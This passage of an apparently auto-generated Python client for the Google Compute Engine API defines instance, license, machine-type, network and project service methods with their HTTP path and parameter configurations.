    relative_path=u'projects/{project}/aggregated/instances',
    request_field='',
    request_type_name=u'ComputeInstancesAggregatedListRequest',
    response_type_name=u'InstanceAggregatedList',
    supports_download=False,
)
def AttachDisk(self, request, global_params=None):
    """Attaches an existing Disk resource to an instance. You must first create the disk before you can attach it. It is not possible to create and attach a disk at the same time. For more information, read Adding a persistent disk to your instance.

    Args:
      request: (ComputeInstancesAttachDiskRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('AttachDisk'), request,
        global_params=global_params)

AttachDisk.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.attachDisk',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/attachDisk',
    request_field=u'attachedDisk',
    request_type_name=u'ComputeInstancesAttachDiskRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Delete(self, request, global_params=None):
    """Deletes the specified Instance resource. For more information, see Stopping or Deleting an Instance.

    Args:
      request: (ComputeInstancesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request, global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'DELETE',
    method_id=u'compute.instances.delete',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
    request_field='',
    request_type_name=u'ComputeInstancesDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DeleteAccessConfig(self, request, global_params=None):
    """Deletes an access config from an instance's network interface.

    Args:
      request: (ComputeInstancesDeleteAccessConfigRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('DeleteAccessConfig'), request,
        global_params=global_params)

DeleteAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.deleteAccessConfig',
    ordered_params=[u'project', u'zone', u'instance', u'accessConfig', u'networkInterface'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'accessConfig', u'networkInterface'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/deleteAccessConfig',
    request_field='',
    request_type_name=u'ComputeInstancesDeleteAccessConfigRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DetachDisk(self, request, global_params=None):
    """Detaches a disk from an instance.

    Args:
      request: (ComputeInstancesDetachDiskRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('DetachDisk'), request,
        global_params=global_params)

DetachDisk.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.detachDisk',
    ordered_params=[u'project', u'zone', u'instance', u'deviceName'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'deviceName'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/detachDisk',
    request_field='',
    request_type_name=u'ComputeInstancesDetachDiskRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
    """Returns the specified Instance resource. Get a list of available instances by making a list() request.

    Args:
      request: (ComputeInstancesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Instance) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('Get'), request, global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instances.get',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
    request_field='',
    request_type_name=u'ComputeInstancesGetRequest',
    response_type_name=u'Instance',
    supports_download=False,
)
def GetSerialPortOutput(self, request, global_params=None):
    """Returns the specified instance's serial port output.

    Args:
      request: (ComputeInstancesGetSerialPortOutputRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (SerialPortOutput) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('GetSerialPortOutput'), request,
        global_params=global_params)

GetSerialPortOutput.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instances.getSerialPortOutput',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'port', u'start'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/serialPort',
    request_field='',
    request_type_name=u'ComputeInstancesGetSerialPortOutputRequest',
    response_type_name=u'SerialPortOutput',
    supports_download=False,
)
def Insert(self, request, global_params=None):
    """Creates an instance resource in the specified project using the data included in the request.

    Args:
      request: (ComputeInstancesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request, global_params=global_params)

Insert.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.insert',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances',
    request_field=u'instance',
    request_type_name=u'ComputeInstancesInsertRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def List(self, request, global_params=None):
    """Retrieves the list of instances contained within the specified zone.

    Args:
      request: (ComputeInstancesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InstanceList) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('List'), request, global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instances.list',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/zones/{zone}/instances',
    request_field='',
    request_type_name=u'ComputeInstancesListRequest',
    response_type_name=u'InstanceList',
    supports_download=False,
)
def Reset(self, request, global_params=None):
    """Performs a reset on the instance. For more information, see Resetting an instance.

    Args:
      request: (ComputeInstancesResetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    # Resolve the per-method wire configuration, then issue the HTTP call.
    return self._RunMethod(
        self.GetMethodConfig('Reset'), request, global_params=global_params)

Reset.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.reset',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/reset',
    request_field='',
    request_type_name=u'ComputeInstancesResetRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetDiskAutoDelete(self, request, global_params=None):
    """Sets the auto-delete flag for a disk attached to an instance.

    Args:
      request: (ComputeInstancesSetDiskAutoDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetDiskAutoDelete')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; note autoDelete/deviceName are required query params
# (listed in both ordered_params and query_params), not path components.
SetDiskAutoDelete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setDiskAutoDelete',
    ordered_params=[u'project', u'zone', u'instance', u'autoDelete', u'deviceName'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'autoDelete', u'deviceName'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setDiskAutoDelete',
    request_field='',
    request_type_name=u'ComputeInstancesSetDiskAutoDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetLabels(self, request, global_params=None):
    """Sets labels on an instance. To learn more about labels, read the Labeling Resources documentation.

    Args:
      request: (ComputeInstancesSetLabelsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetLabels')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setLabels',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setLabels',
    request_field=u'instancesSetLabelsRequest',
    request_type_name=u'ComputeInstancesSetLabelsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMachineResources(self, request, global_params=None):
    """Changes the number and/or type of accelerator for a stopped instance to the values specified in the request.

    Args:
      request: (ComputeInstancesSetMachineResourcesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetMachineResources')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
SetMachineResources.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMachineResources',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineResources',
    request_field=u'instancesSetMachineResourcesRequest',
    request_type_name=u'ComputeInstancesSetMachineResourcesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMachineType(self, request, global_params=None):
    """Changes the machine type for a stopped instance to the machine type specified in the request.

    Args:
      request: (ComputeInstancesSetMachineTypeRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetMachineType')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
SetMachineType.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMachineType',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineType',
    request_field=u'instancesSetMachineTypeRequest',
    request_type_name=u'ComputeInstancesSetMachineTypeRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMetadata(self, request, global_params=None):
    """Sets metadata for the specified instance to the data included in the request.

    Args:
      request: (ComputeInstancesSetMetadataRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetMetadata')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; the 'metadata' field of the request message becomes the HTTP body.
SetMetadata.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMetadata',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMetadata',
    request_field=u'metadata',
    request_type_name=u'ComputeInstancesSetMetadataRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetScheduling(self, request, global_params=None):
    """Sets an instance's scheduling options.

    Args:
      request: (ComputeInstancesSetSchedulingRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetScheduling')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
SetScheduling.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setScheduling',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setScheduling',
    request_field=u'scheduling',
    request_type_name=u'ComputeInstancesSetSchedulingRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetServiceAccount(self, request, global_params=None):
    """Sets the service account on the instance. For more information, read Changing the service account and access scopes for an instance.

    Args:
      request: (ComputeInstancesSetServiceAccountRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetServiceAccount')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
SetServiceAccount.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setServiceAccount',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setServiceAccount',
    request_field=u'instancesSetServiceAccountRequest',
    request_type_name=u'ComputeInstancesSetServiceAccountRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetTags(self, request, global_params=None):
    """Sets tags for the specified instance to the data included in the request.

    Args:
      request: (ComputeInstancesSetTagsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetTags')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; the 'tags' field of the request message becomes the HTTP body.
SetTags.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setTags',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setTags',
    request_field=u'tags',
    request_type_name=u'ComputeInstancesSetTagsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Start(self, request, global_params=None):
    """Starts an instance that was stopped using the instances().stop method. For more information, see Restart an instance.

    Args:
      request: (ComputeInstancesStartRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Start')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
Start.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.start',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/start',
    request_field='',
    request_type_name=u'ComputeInstancesStartRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
# NOTE(review): the original docstring here was a verbatim copy of Start's
# (including its typo); the summary below is adjusted to reflect the request
# body (instancesStartWithEncryptionKeyRequest) — confirm against the API docs.
def StartWithEncryptionKey(self, request, global_params=None):
    """Starts an instance that was stopped using the instances().stop method, supplying the encryption keys required for its encrypted disks. For more information, see Restart an instance.

    Args:
      request: (ComputeInstancesStartWithEncryptionKeyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('StartWithEncryptionKey')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
StartWithEncryptionKey.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.startWithEncryptionKey',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/startWithEncryptionKey',
    request_field=u'instancesStartWithEncryptionKeyRequest',
    request_type_name=u'ComputeInstancesStartWithEncryptionKeyRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Stop(self, request, global_params=None):
    """Stops a running instance, shutting it down cleanly, and allows you to restart the instance at a later time.

    Stopped instances do not incur per-minute, virtual machine usage charges
    while they are stopped, but any resources that the virtual machine is
    using, such as persistent disks and static IP addresses, will continue to
    be charged until they are deleted. For more information, see Stopping an
    instance.

    Args:
      request: (ComputeInstancesStopRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Stop')
    return self._RunMethod(
        config, request, global_params=global_params)

# Generated wire metadata; evaluated lazily by base_api to build the HTTP request.
Stop.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.stop',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/stop',
    request_field='',
    request_type_name=u'ComputeInstancesStopRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class LicensesService(base_api.BaseApiService):
    """Service class for the licenses resource.

    Auto-generated: each public method fetches its wire metadata via
    GetMethodConfig and delegates to base_api's _RunMethod.
    """

    # Resource name used by the generated client machinery.
    _NAME = u'licenses'

    def __init__(self, client):
        super(ComputeV1.LicensesService, self).__init__(client)
        # This service has no media-upload methods.
        self._upload_configs = {
        }

    def Get(self, request, global_params=None):
        """Returns the specified License resource.

        Args:
          request: (ComputeLicensesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (License) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Generated wire metadata; evaluated lazily by base_api.
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.licenses.get',
        ordered_params=[u'project', u'license'],
        path_params=[u'license', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/licenses/{license}',
        request_field='',
        request_type_name=u'ComputeLicensesGetRequest',
        response_type_name=u'License',
        supports_download=False,
    )
class MachineTypesService(base_api.BaseApiService):
    """Service class for the machineTypes resource.

    Auto-generated: each public method fetches its wire metadata via
    GetMethodConfig and delegates to base_api's _RunMethod; the
    X.method_config lambdas carry the HTTP mapping for each method.
    """

    # Resource name used by the generated client machinery.
    _NAME = u'machineTypes'

    def __init__(self, client):
        super(ComputeV1.MachineTypesService, self).__init__(client)
        # This service has no media-upload methods.
        self._upload_configs = {
        }

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of machine types.

        Args:
          request: (ComputeMachineTypesAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (MachineTypeAggregatedList) The response message.
        """
        config = self.GetMethodConfig('AggregatedList')
        return self._RunMethod(
            config, request, global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.machineTypes.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/machineTypes',
        request_field='',
        request_type_name=u'ComputeMachineTypesAggregatedListRequest',
        response_type_name=u'MachineTypeAggregatedList',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified machine type. Get a list of available machine types by making a list() request.

        Args:
          request: (ComputeMachineTypesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (MachineType) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.machineTypes.get',
        ordered_params=[u'project', u'zone', u'machineType'],
        path_params=[u'machineType', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/machineTypes/{machineType}',
        request_field='',
        request_type_name=u'ComputeMachineTypesGetRequest',
        response_type_name=u'MachineType',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of machine types available to the specified project.

        Args:
          request: (ComputeMachineTypesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (MachineTypeList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.machineTypes.list',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/machineTypes',
        request_field='',
        request_type_name=u'ComputeMachineTypesListRequest',
        response_type_name=u'MachineTypeList',
        supports_download=False,
    )
class NetworksService(base_api.BaseApiService):
    """Service class for the networks resource.

    Auto-generated: each public method fetches its wire metadata via
    GetMethodConfig and delegates to base_api's _RunMethod; the
    X.method_config lambdas carry the HTTP mapping for each method.
    """

    # Resource name used by the generated client machinery.
    _NAME = u'networks'

    def __init__(self, client):
        super(ComputeV1.NetworksService, self).__init__(client)
        # This service has no media-upload methods.
        self._upload_configs = {
        }

    def AddPeering(self, request, global_params=None):
        """Adds a peering to the specified network.

        Args:
          request: (ComputeNetworksAddPeeringRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('AddPeering')
        return self._RunMethod(
            config, request, global_params=global_params)

    AddPeering.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.addPeering',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{network}/addPeering',
        request_field=u'networksAddPeeringRequest',
        request_type_name=u'ComputeNetworksAddPeeringRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified network.

        Args:
          request: (ComputeNetworksDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Delete')
        return self._RunMethod(
            config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.networks.delete',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{network}',
        request_field='',
        request_type_name=u'ComputeNetworksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified network. Get a list of available networks by making a list() request.

        Args:
          request: (ComputeNetworksGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Network) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.networks.get',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{network}',
        request_field='',
        request_type_name=u'ComputeNetworksGetRequest',
        response_type_name=u'Network',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a network in the specified project using the data included in the request.

        Args:
          request: (ComputeNetworksInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Insert')
        return self._RunMethod(
            config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks',
        request_field=u'network',
        request_type_name=u'ComputeNetworksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of networks available to the specified project.

        Args:
          request: (ComputeNetworksListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (NetworkList) The response message.
        """
        config = self.GetMethodConfig('List')
        return self._RunMethod(
            config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.networks.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/networks',
        request_field='',
        request_type_name=u'ComputeNetworksListRequest',
        response_type_name=u'NetworkList',
        supports_download=False,
    )

    def RemovePeering(self, request, global_params=None):
        """Removes a peering from the specified network.

        Args:
          request: (ComputeNetworksRemovePeeringRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('RemovePeering')
        return self._RunMethod(
            config, request, global_params=global_params)

    RemovePeering.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.removePeering',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{network}/removePeering',
        request_field=u'networksRemovePeeringRequest',
        request_type_name=u'ComputeNetworksRemovePeeringRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SwitchToCustomMode(self, request, global_params=None):
        """Switches the network mode from auto subnet mode to custom subnet mode.

        Args:
          request: (ComputeNetworksSwitchToCustomModeRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SwitchToCustomMode')
        return self._RunMethod(
            config, request, global_params=global_params)

    SwitchToCustomMode.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.switchToCustomMode',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{network}/switchToCustomMode',
        request_field='',
        request_type_name=u'ComputeNetworksSwitchToCustomModeRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class ProjectsService(base_api.BaseApiService):
    """Service class for the projects resource.

    Auto-generated: each public method fetches its wire metadata via
    GetMethodConfig and delegates to base_api's _RunMethod; the
    X.method_config lambdas carry the HTTP mapping for each method.
    """

    # Resource name used by the generated client machinery.
    _NAME = u'projects'

    def __init__(self, client):
        super(ComputeV1.ProjectsService, self).__init__(client)
        # This service has no media-upload methods.
        self._upload_configs = {
        }

    def DisableXpnHost(self, request, global_params=None):
        """Disable this project as a shared VPC host project.

        Args:
          request: (ComputeProjectsDisableXpnHostRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('DisableXpnHost')
        return self._RunMethod(
            config, request, global_params=global_params)

    DisableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.disableXpnHost',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/disableXpnHost',
        request_field='',
        request_type_name=u'ComputeProjectsDisableXpnHostRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def DisableXpnResource(self, request, global_params=None):
        """Disable a service resource (a.k.a service project) associated with this host project.

        Args:
          request: (ComputeProjectsDisableXpnResourceRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('DisableXpnResource')
        return self._RunMethod(
            config, request, global_params=global_params)

    DisableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.disableXpnResource',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/disableXpnResource',
        request_field=u'projectsDisableXpnResourceRequest',
        request_type_name=u'ComputeProjectsDisableXpnResourceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def EnableXpnHost(self, request, global_params=None):
        """Enable this project as a shared VPC host project.

        Args:
          request: (ComputeProjectsEnableXpnHostRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('EnableXpnHost')
        return self._RunMethod(
            config, request, global_params=global_params)

    EnableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.enableXpnHost',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/enableXpnHost',
        request_field='',
        request_type_name=u'ComputeProjectsEnableXpnHostRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def EnableXpnResource(self, request, global_params=None):
        """Enable service resource (a.k.a service project) for a host project, so that subnets in the host project can be used by instances in the service project.

        Args:
          request: (ComputeProjectsEnableXpnResourceRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('EnableXpnResource')
        return self._RunMethod(
            config, request, global_params=global_params)

    EnableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.enableXpnResource',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/enableXpnResource',
        request_field=u'projectsEnableXpnResourceRequest',
        request_type_name=u'ComputeProjectsEnableXpnResourceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified Project resource.

        Args:
          request: (ComputeProjectsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Project) The response message.
        """
